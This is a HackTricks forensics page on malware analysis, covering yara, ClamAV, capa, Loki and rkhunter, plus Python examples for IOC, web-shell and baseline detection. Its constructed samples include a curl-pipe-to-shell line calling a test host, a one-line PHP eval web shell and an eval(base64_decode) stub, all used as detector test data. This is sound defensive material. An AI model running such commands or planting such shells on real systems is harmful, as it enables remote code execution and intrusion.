hacktricks/forensics/basic-forensic-methodology/malware-analysis.md
2024-02-11 02:13:58 +00:00


Malware Analysis

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Forensics CheatSheets

https://www.jaiminton.com/cheatsheet/DFIR/#

Online Services

Offline Antivirus and Detection Tools

Yara

Install

sudo apt-get install -y yara

Prepare rules

Use this script to download and merge all the public yara malware rules from github: https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9
Create the rules directory and execute the script. It will create a file called malware_rules.yar that contains all the yara rules for malware. Review the merged file before relying on it: community rules vary in quality and some will produce false positives on legitimate software.

wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py

Scan

Malware analysis starts by scanning the suspicious file or system for signs of malicious activity: signature scanners, network monitoring and other techniques that surface indicators of compromise (IOCs) or suspicious behaviour. The goal is to detect and isolate any malware present before going into deeper analysis.

Antivirus Scanning

Signature scanners compare files, directories or the whole system against a database of known malware signatures (with yara, against the rule set you prepared above) and report any match. Signature scanning only catches what is already known, so a clean result is not proof of a clean system.

Network Monitoring

Network monitoring tools inspect packets to spot malware communication or unauthorised access attempts, for example beaconing to command and control (C2) servers or data exfiltration.

File Analysis

File analysis examines the suspicious file itself, with two complementary approaches:

  • Static Analysis: examine the file without executing it: metadata, structure, imports, strings and any obfuscated code. It reveals known malware patterns and indicators of malicious behaviour.

  • Dynamic Analysis: execute the file in a controlled environment (a virtual machine or sandbox) and observe system calls, network activity and file modifications. It reveals behaviour that static analysis misses, such as code that is only unpacked at runtime.

Memory Analysis

Memory analysis examines running processes, loaded modules and network connections in a memory image to find malware that lives only in memory or code injected into legitimate processes.

Registry Analysis

On Windows, malware often modifies the registry to gain persistence or to execute at startup; reviewing run keys, services and other autostart locations reveals suspicious entries.

Log Analysis

System and application logs (event logs, authentication logs, web server logs) record system events, user activity and network connections; abnormal patterns there often indicate malware.

Behavioral Analysis

Behavioral analysis observes processes, network connections, file modifications and other events over time to catch activity that signature-based techniques miss.

Together these techniques gather the information needed to confirm a compromise and drive further investigation. The yara commands below run the signature scan with the rule set prepared above.

yara -w malware_rules.yar image     #Scan 1 file (-w silences rule compilation warnings)
yara -w -r malware_rules.yar folder #Scan the whole folder recursively (without -r only the top level is scanned)

yarGen: Check for malware and create rules

You can use the tool yarGen to generate yara rules from a binary. Check out these tutorials: Part 1, Part 2, Part 3

python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m  ../../mals/

ClamAV

Install

sudo apt-get install -y clamav

Scan


sudo freshclam         #Update signatures
clamscan filepath      #Scan 1 file
clamscan -r folderpath #Scan the whole folder recursively (without -r subdirectories are skipped)

Capa

Capa detects potentially malicious capabilities in executables: PE, ELF, .NET. So it will find things like Att&ck tactics, or suspicious capabilities such as:

  • check for OutputDebugString error
  • run as a service
  • create process

Get it in the Github repo.

IOC

IOC means Indicator Of Compromise. An IOC is a set of conditions that identifies some potentially unwanted software or confirmed malware. Blue Teams use this kind of definition to search for this kind of malicious files in their systems and networks.
Sharing these definitions is very useful: when malware is identified on a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.

A tool to create or modify IOCs is IOC Editor.
You can use tools such as Redline to search for defined IOCs in a device.

Loki

Loki is a scanner for Simple Indicators of Compromise.
Detection is based on four detection methods:

1. File Name IOC
Regex match on full file path/name

2. Yara Rule Check
Yara signature matches on file data and process memory

3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files

4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
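As an added example (not code from this page or from Loki itself), the following Python script applies three of the four Loki detection methods described above, filename IOCs, hash IOCs and C2 endpoint IOCs, to constructed data: an in-memory file set stands in for a filesystem walk and a constructed connection table stands in for the output of `ss -tanp` or `netstat`. All paths, hashes and addresses are hypothetical (the IPs come from the TEST-NET ranges); yara rule matching is left out because it needs the yara-python bindings.

```python
import hashlib
import re
from dataclasses import dataclass

# Constructed IOC set (hypothetical values, not real threat intelligence).
FILENAME_IOCS = [
    re.compile(r"(?i)\\Windows\\Temp\\[^\\]+\.exe$"),   # executables dropped in C:\Windows\Temp
    re.compile(r"/tmp/\.[^/]+\.sh$"),                    # hidden shell scripts in /tmp
]
# Known-bad hashes (md5/sha1/sha256 hex digests); filled in below from a sample.
HASH_IOCS = set()
# C2 endpoints as (ip, port); TEST-NET addresses, hypothetical.
C2_IOCS = {("203.0.113.10", 443), ("198.51.100.7", 8080)}


@dataclass
class Finding:
    kind: str      # "filename", "hash" or "c2"
    subject: str   # file path or process
    detail: str    # matched pattern, digest or endpoint


def file_hashes(data: bytes) -> dict:
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def scan_files(files: dict, filename_iocs, hash_iocs) -> list:
    """files maps path -> content; on a real host this would come from walking the disk."""
    findings = []
    for path, data in files.items():
        for rx in filename_iocs:
            if rx.search(path):
                findings.append(Finding("filename", path, rx.pattern))
        for algo, digest in file_hashes(data).items():
            if digest in hash_iocs:
                findings.append(Finding("hash", path, f"{algo}:{digest}"))
    return findings


def scan_connections(connections, c2_iocs) -> list:
    """connections: (pid, process_name, remote_ip, remote_port), e.g. parsed from `ss -tanp`."""
    return [
        Finding("c2", f"{name}[{pid}]", f"{ip}:{port}")
        for pid, name, ip, port in connections
        if (ip, port) in c2_iocs
    ]


# Constructed sample file system and connection table.
SAMPLE_FILES = {
    "C:\\Windows\\Temp\\svchost.exe": b"MZ\x90\x00constructed-sample-1",
    "C:\\Users\\alice\\report.docx": b"PK\x03\x04constructed-sample-2",
    "/tmp/.x.sh": b"#!/bin/sh\ncurl http://198.51.100.7:8080/p | sh\n",
    "/etc/hostname": b"workstation\n",
}
# Mark one sample as known-bad by hash so the hash check has something to hit.
HASH_IOCS.add(hashlib.sha256(SAMPLE_FILES["C:\\Users\\alice\\report.docx"]).hexdigest())

SAMPLE_CONNECTIONS = [
    (1234, "explorer.exe", "93.184.216.34", 443),   # benign
    (4321, "updater.exe", "203.0.113.10", 443),     # C2 IOC hit
    (777, "sh", "198.51.100.7", 8080),              # C2 IOC hit
]


def run_scan() -> list:
    return (scan_files(SAMPLE_FILES, FILENAME_IOCS, HASH_IOCS)
            + scan_connections(SAMPLE_CONNECTIONS, C2_IOCS))


if __name__ == "__main__":
    for f in run_scan():
        print(f"[{f.kind}] {f.subject}: {f.detail}")
```

The constructed run yields two filename hits, one hash hit and two C2 hits. Note that a hash IOC only matches a byte-identical file, which is why Loki also keeps filename and yara checks: repacking the sample changes every digest but rarely the drop path or the strings inside it.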

Linux Malware Detect

Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions and from malware community resources.

rkhunter

A tool like rkhunter can be used to check the filesystem for possible rootkits and malware.

sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]

FLOSS

FLOSS is a tool that will try to find obfuscated strings inside executables using different techniques.

PEpper

PEpper checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).

PEstudio

PEstudio is a tool that allows to get information of Windows executables such as imports, exports and headers, but it will also check VirusTotal and find potential Att&ck techniques.

Detect It Easy(DiE)

DiE is a tool to detect if a file is encrypted and also to find packers.

NeoPI

NeoPI is a Python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. The intended purpose of NeoPI is to aid in the detection of hidden web shell code.

php-malware-finder

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malware/webshells.
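To show what the statistical tests of NeoPI and the function-list check of php-malware-finder actually measure, here is an added Python example that is not code from either project or from this page. It computes byte entropy, the longest whitespace-free "word", the index of coincidence and the set of frequently abused PHP functions for two constructed PHP files: a benign helper and an eval(base64_decode(...)) stub. The thresholds in is_suspicious and the function list are assumptions for illustration and should be tuned against a clean copy of the code base being scanned.

```python
import base64
import math
import re
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for repetitive data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def longest_word(text: str) -> int:
    """Length of the longest whitespace-free run; base64 payloads show up as huge 'words'."""
    return max((len(w) for w in text.split()), default=0)


def index_of_coincidence(text: str) -> float:
    """Probability that two randomly chosen letters are equal: ~0.066 for English, ~0.038 for random."""
    letters = [c for c in text.lower() if c.isalpha()]
    n = len(letters)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(letters).values()) / (n * (n - 1))


# PHP functions that web shells abuse far more often than ordinary application code (assumed list).
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13|create_function|"
    r"preg_replace|system|shell_exec|passthru|exec)\s*\(", re.I)


def score_file(name: str, data: bytes) -> dict:
    text = data.decode("utf-8", errors="replace")
    return {
        "name": name,
        "entropy": round(shannon_entropy(data), 3),
        "longest_word": longest_word(text),
        "ic": round(index_of_coincidence(text), 4),
        "suspicious_calls": sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(text)}),
    }


def is_suspicious(score: dict) -> bool:
    # Assumed thresholds for illustration; tune them against a clean copy of the same code base.
    return score["entropy"] > 5.5 or score["longest_word"] > 200 or bool(score["suspicious_calls"])


# Constructed samples (not real malware).
BENIGN_PHP = b"""<?php
// A tiny template helper.
function greet($name) {
    return "Hello, " . htmlspecialchars($name) . "!";
}
echo greet($_GET['name'] ?? 'world');
"""
_BLOB = base64.b64encode(bytes(range(256)) * 2).decode()   # stands in for an encoded payload
OBFUSCATED_PHP = ('<?php\n$p = "' + _BLOB + '";\neval(base64_decode($p));\n').encode()


def score_samples() -> list:
    return [score_file("benign.php", BENIGN_PHP), score_file("obfuscated.php", OBFUSCATED_PHP)]


if __name__ == "__main__":
    for s in score_samples():
        print(("SUSPICIOUS " if is_suspicious(s) else "ok         ") + str(s))
```

Entropy alone misfires on minified JavaScript and compressed assets, and the function list misfires on legitimate admin panels, which is why tools of this kind report several signals per file and leave the final ranking to the analyst.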

Apple Binary Signatures

When checking a malware sample you should always check the signature of the binary, as the developer that signed it may already be related to malware.

#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"

#Check if the apps contents have been modified
codesign --verify --verbose /Applications/Safari.app

#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app

Detection Techniques

File Stacking

If you know that a folder containing the files of a web server was last updated on a certain date, check the creation and modification dates of all the files in the web server, and if any date is suspicious, check that file.

Baselines

If the files of a folder shouldn't have been modified, you can calculate the hash of the original files of the folder and compare them with the current ones. Anything modified will be suspicious. Keep the baseline hashes off the host (or on read-only media), since an attacker who can change the files can also change a baseline stored next to them.

Statistical Analysis

When the information is saved in logs, you can check statistics such as how many times each file of the web server was accessed, as a web shell is likely to be among the most requested files, usually by a single client and via POST.
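The three techniques above, File Stacking, Baselines and Statistical Analysis, are combined in this added Python example, which is not code from this page: a constructed web root snapshot with modification times and contents, a constructed known-good SHA-256 baseline recorded at deploy time, and a few constructed access log lines in Common Log Format. The web shell path, timestamps and client IPs are hypothetical; the "POST-only from a single client" heuristic in suspicious_paths is an assumption and the per-path hit counts are returned so you can rank by volume instead.

```python
import hashlib
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed web root snapshot: path -> (mtime, content). Hypothetical data.
DEPLOY_TIME = datetime(2024, 1, 15, 10, 0, tzinfo=timezone.utc)
ORIGINAL_APP = b"<?php echo 'app';"
WEBROOT = {
    "/var/www/html/index.php": (DEPLOY_TIME, b"<?php include 'app.php';"),
    "/var/www/html/images/logo.png": (DEPLOY_TIME - timedelta(days=30), b"\x89PNG..."),
    # attacker-modified: now includes the dropped shell
    "/var/www/html/app.php": (DEPLOY_TIME + timedelta(days=12, hours=3),
                              ORIGINAL_APP + b" include 'images/cache.php';"),
    # attacker-added web shell hidden among images
    "/var/www/html/images/cache.php": (DEPLOY_TIME + timedelta(days=12, hours=3),
                                       b"<?php @eval($_POST['c']);"),
}

# Known-good baseline: hashes recorded at deploy time and stored off the host.
KNOWN_GOOD = {
    "/var/www/html/index.php": hashlib.sha256(b"<?php include 'app.php';").hexdigest(),
    "/var/www/html/app.php": hashlib.sha256(ORIGINAL_APP).hexdigest(),
    "/var/www/html/images/logo.png": hashlib.sha256(b"\x89PNG...").hexdigest(),
}


def stack_by_time(files: dict, last_legit_change: datetime) -> list:
    """File stacking: anything modified after the last legitimate deployment is a lead."""
    return sorted(p for p, (mtime, _) in files.items() if mtime > last_legit_change)


def diff_against_baseline(files: dict, known_good: dict) -> dict:
    """Baseline check: added, removed and modified files versus the stored SHA-256 set."""
    current = {p: hashlib.sha256(c).hexdigest() for p, (_, c) in files.items()}
    return {
        "added": sorted(set(current) - set(known_good)),
        "removed": sorted(set(known_good) - set(current)),
        "modified": sorted(p for p in current.keys() & known_good.keys()
                           if current[p] != known_good[p]),
    }


# Constructed access log in Common Log Format.
ACCESS_LOG = """\
203.0.113.5 - - [27/Jan/2024:13:01:02 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.5 - - [27/Jan/2024:13:01:03 +0000] "GET /images/logo.png HTTP/1.1" 200 8192
198.51.100.9 - - [27/Jan/2024:13:05:10 +0000] "POST /images/cache.php HTTP/1.1" 200 64
198.51.100.9 - - [27/Jan/2024:13:05:41 +0000] "POST /images/cache.php HTTP/1.1" 200 71
198.51.100.9 - - [27/Jan/2024:13:06:12 +0000] "POST /images/cache.php HTTP/1.1" 200 88
203.0.113.77 - - [27/Jan/2024:13:07:00 +0000] "GET /index.php HTTP/1.1" 200 512
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\d+|-)')


def request_stats(log_text: str) -> dict:
    """Per path: total hits, POST hits and number of distinct client IPs."""
    hits, posts, clients = Counter(), Counter(), {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        hits[path] += 1
        clients.setdefault(path, set()).add(m.group("ip"))
        if m.group("method") == "POST":
            posts[path] += 1
    return {p: {"hits": hits[p], "posts": posts[p], "clients": len(clients[p])} for p in hits}


def suspicious_paths(stats: dict) -> list:
    """Web shells are typically POSTed to repeatedly by a single client and never browsed with GET."""
    return sorted(p for p, s in stats.items()
                  if s["posts"] == s["hits"] and s["posts"] > 0 and s["clients"] <= 1)


if __name__ == "__main__":
    print("stacked:", stack_by_time(WEBROOT, DEPLOY_TIME))
    print("baseline:", diff_against_baseline(WEBROOT, KNOWN_GOOD))
    print("stats:", request_stats(ACCESS_LOG))
    print("suspicious:", suspicious_paths(request_stats(ACCESS_LOG)))
```

Each technique catches the shell on its own here, but they fail independently in practice: attackers reset mtimes with touch -r, baselines are only as trustworthy as where they are stored, and a shell reached through a legitimate-looking GET parameter will not stand out in request statistics. Running all three and intersecting the leads is the point.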
